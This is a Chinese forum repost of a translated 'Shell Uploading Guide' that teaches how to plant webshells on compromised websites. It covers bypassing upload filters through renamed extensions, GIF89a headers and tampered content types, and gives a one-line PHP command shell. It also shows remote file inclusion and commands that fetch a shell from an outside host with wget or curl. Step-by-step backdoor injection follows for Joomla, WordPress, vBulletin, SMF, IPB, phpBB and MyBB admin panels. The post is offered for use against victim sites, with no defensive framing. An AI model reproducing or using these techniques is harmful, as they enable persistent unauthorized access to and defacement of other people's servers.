Board logo

标题: 上传Webshell的方法指南(Shell Uploading Guide) [打印本页]
作者: 李亦何    时间: 28-11-2020 08:22     标题: 上传Webshell的方法指南(Shell Uploading Guide)

---李亦何编译


     当获得管理员访问权限/登录该网站后台管理后,许多新手在网站上传Shell时都遇到了问题. 所以,我写这篇文章是为他们做一些技术指导或帮助. 基本上说,shell使我们可以远程访问该服务器. 这样的Webshell可用不同的语言提供,例如php,asp / aspx,cgi等。因此,我们必须根据服务器脚本选择将在服务器上运行的Shell. 如果服务器支持php shell,那么我们必须选择任何php shell,否则选择asp&cgi。 现在,让我们进入要点... 登录到站站后台管理后,如果我们在网站中找到任何上载选项,则可以轻松地上传Webshell. 但是有时我们必须做一些更改才能上传shell。


方式1
由于Webshell采用PHP格式,因此有时某些站点不允许直接使用PHP扩展名来上传此类脚本. 如果发生这种情况,则只需重命名Webshell名称. 添加.gif / .jpg / .html / .doc等。示例:假设在重命名shell名称之前是shell.php,然后将其重命名为shell.php.jpg或其他名称。


方式2
首先上传一个简单的shell程序,防病毒和防火墙无法检测到该Webshell. 然后通过自己的shell上传多功能的Webshell, 你可以在网上下载到shell程序.


方式3
服务器的少量防火墙通过检查标头来检测Webshell脚本,并且不允许我们上传Webshell程序. 因此我们可以使用"GIF89A shell脚本旁路"方法绕过它. 在记事本中打开Webshell,添加"GIF89a;" 在Webshell程序代码开始之前不加引号. 如下...
GIF89a; 取决于他们使用哪种文件验证,服务器可能会以为它是一个映像,这使服务器误以为是因为它在读取文件时会找到gif标头,并会因为它是image而确保其安全。


方式4
此方法更高级, 这仅适用于客户端过滤器,不适用于服务器端. 下载适用于Firefox的Firebug,然后编辑上传的html。
<form enctype=\"multipart/form-data\" action=\"uploader.php\" method=\"OST\"> Upload DRP File: <input name=\"Upload Saved Replay\" type=\"file\" accept=\"*.jpg\"/><br /> <input type=\"submit\" value=\"Upload File\" /> </form>
更改过滤器接受。 到*。*或将其完全删除,然后就可以上传任何类型的文件。


方式5
首先为您的firefox浏览器下载“ LIVE HTTP HEADERS”插件
1.将您的shell程序名称重命名为shell.php.jpg(或该网站支持的名称。在我的情况下,该网站仅支持jpg文件。这就是为什么我将其重命名为shell.php.jpg。)
2.打开Firefox并启动Live HTTP Headers插件,然后上传您的Shell。
3.然后,您的Live HTTP标头将类似于以下内容



4.然后,单击shell.php.jpg之后,再单击“Replay”按钮.
5.然后再次打开一个新窗口,在该窗口中将有两个框,但是我们必须在第二个框上进行操作。
6.在第二个框中,将您的shell.php.jpg重命名为shell.php,然后再次单击Reply按钮



方式6
为自己找到edjpgcom.exe的副本“ edjpgcom是一个免费的Windows应用程序,允许您更改(或添加)JPEG文件中的JPEG注释。” 用法:-edjpgcom“ filename.jpg”现在将其添加到jpg注释中,因为由于限制等原因您将无法在其中放置整个Webshell。
“; <?php system($_GET ['cmd']);echo ?>
现在将您的jpg重命名为.php并上传。


方式7
您可以欺骗Web服务器以使其认为上传映像而不是php shell的另一种方法是获取Firefox并安装“ tamperdata”,然后单击“启动篡改”并上传php shell,然后篡改抓包数据并更改content-Type 从“应用程序/八位字节流”到“image/jpeg”。 如果您在使用tamperdata上传shell时遇到任何问题,则只需执行简单的Google搜索即可,网络上有很多关于此的视频教程. 因此,我不会逐步解释这一点。


方式8
当我们在网站上找到一个上传按钮时,以上所有提及的方式均有效。 但是如果没有上传按钮,则在此处上传Webshell并不容易。 我们可以尝试一些事情……我们必须找出现有php / asp / aspx页面是否存在编辑选项。 如果有编辑选项,则打开该页面并删除整个脚本。 之后,在记事本中打开Webshell。 复制脚本,粘贴到该页面。 最后,保存它。 现在,该链接将成为您的Webshell。 也许我们可以在网站的以下页面中找到编辑选项……
Contact us.php /Contact us.asp
Class.php / Class.asp
About us.php /About us.asp
Terms.php / terms.asp
注意:在某些新闻,车辆销售,购物车等网站中,通过管理控制台登录后,没有任何选择可以上传文件. 它们仅允许通过cpanel登录后上传文件。


方式9
有时,在某些远程文件包括易受攻击的站点中,我们必须从另一个主机站点执行Webshell. 方法:
1)在免费的托管站点中上传您的Webshell, www.my3gb.com www.3owl.comwww.ripway.comwww.000webhost.com等。
2)现在,假设您的带shell网站链接为: www.example.my3gb.com/c99.txt,而您的易受攻击站点为www.site.com
3)现在,我们必须执行以下命令来获得对该站点的Shell访问。 http://www.site.com/v2/index.php?page=http://www.example.my3gb.com/c99.txt
4)根据您的Webshell和受害者网站链接替换命令中的网站链接。
在joomla,wp,vb,smf,ipb,mybb SITES中上传Webshell
在上面提到的网站中,我们通常无法找到直接的上传选项。 因此,我们必须通过其他方式进行。

1.Joomla网站:
登录到adminpanel后,您会在第5号找到扩展。展开它,单击它>模板管理器>检查任何模板(如beez,ja_purity),然后单击编辑(右上侧),然后单击编辑html。现在粘贴您的Webshell 代码,然后点击保存...完成site.com/templates/模板名称/index.php,如site.com/templates/beez/index.php
2.WordPress:
登录到管理面板,展开外观,然后单击编辑器>您将找到style.css,现在在右侧选择404.php粘贴您的Webshell代码,然后单击编辑文件,您可以在site.com/wp-content/themes/theme名称中找到Webshell 你edit / 404.php
3.Vbulletin:
1-登录admin cp后台管理
2-在“插件和产品”下,选择添加新插件
3-按如下所示调整设置:产品:vBulletin Hook位置:global_start标题:(任何内容……)执行顺序:码:
ob_start();系统($ _GET ['cmd']); $ execcode = ob_get_contents(); ob_end_clean();
插件处于活动状态:是
4-添加插件后,转到“样式和设计”标题,选择“样式管理器”
5-在下拉菜单中的默认样式下,选择编辑模板。
6-滚动ForumHome模型并进行扩展。单击FORUMHOME旁边的[自定义]。
7-搜索代码:
$ header在顶部附近的某个地方。替换为:代码:$ header $ execcode
8-现在进入论坛并在index.php之后添加码:
?cmd = wget http://www.site.com/shell.txt;mv shell.txt shell.php
所以看起来像代码:http: //www.site.com/pathtoforum/index.php?cmd=wget http: //www.site.com/shell.txt;mv  shell.txt shell.php
这样做是下载shell.txt,然后将其重命名为shell.php。现在,该shell必须位于shell.php论坛目录中……如果没有,则在该服务器上禁用了wget,您可以尝试其他方法:
http://www.site.com/pathtoforum/index.php?cmd=CURL http://www.site.com/shell.txt> shell.php
http://www.site.com/pathtoforum/index.php?cmd=GET http://www.site.com/shell.txt shell.php
4,SMF
登录到管理面板,您需要下载zip格式的任何smf主题并将其放入你的shell.php并保存管理面板>选择主题和布局>安装新主题>浏览并上传具有shell.php的主题之后 上传shell将找到> site.com/Themes/theme name / shell.php
5,IPB
登录管理面板>外观>管理语言,选择语言>部分(示例)public_help编辑:help.txt从列表中选择主题,或搜索主题在右侧框中添加以下代码:
$ {$ {print $ query ='cd缓存; wget http://link_to_shell/shell.txt; mv shell.txt shell.php'}} $ {$ {system($ query,$ out)}} $ {$ {print $ out}}
添加后,请指定到底部。现在我们继续http://www.site.com/index.php?app=core&module=help,我们添加的代码将完成,并且您将获得@Webshell, www.site.com/cache/shell.php
6.phpBB
登录到管理面板>进行样式->模板->编辑,为模板文件选择faq_body.html在以下位置:
我们增加:
fwrite(fopen($_GET [o],'w'),file_get_contents($_GET ));
并保存它。现在继续:
www.site.com/forum/faq.php?o=shell.php&i=http://link_to_shell.com/shell.txt shell在站点路径/shell.php中找到Mybb论坛登录admincp>转到模板和样式,找到默认的MyBB Theme。 然后转到模板,展开当前主题使用的模板。 查找日历模板,单击它。 点击“日历”。 在所有html代码上方,粘贴以下代码:
http://pastebin.com/9dHWmxNq
保存 shell将在site.com/calendar.php中找到
注意:如果您遇到类似“代码无法编辑的危险”的错误,则只需将您的污损代码粘贴到污损calendar.php


This artical link:  https://zer0w0rm.blogspot.com/2014/07/shell-uploading-guide.html

图片附件: liv1.jpg (28-11-2020 08:22, 87.3 KB) / 该附件被下载次数 474
http://forum.kensoft.com/attachment.php?aid=82



图片附件: liv2.jpg (28-11-2020 08:22, 123.68 KB) / 该附件被下载次数 410
http://forum.kensoft.com/attachment.php?aid=83





欢迎光临 建锋网络论坛 (http://forum.kensoft.com/) Powered by Discuz! 6.0.0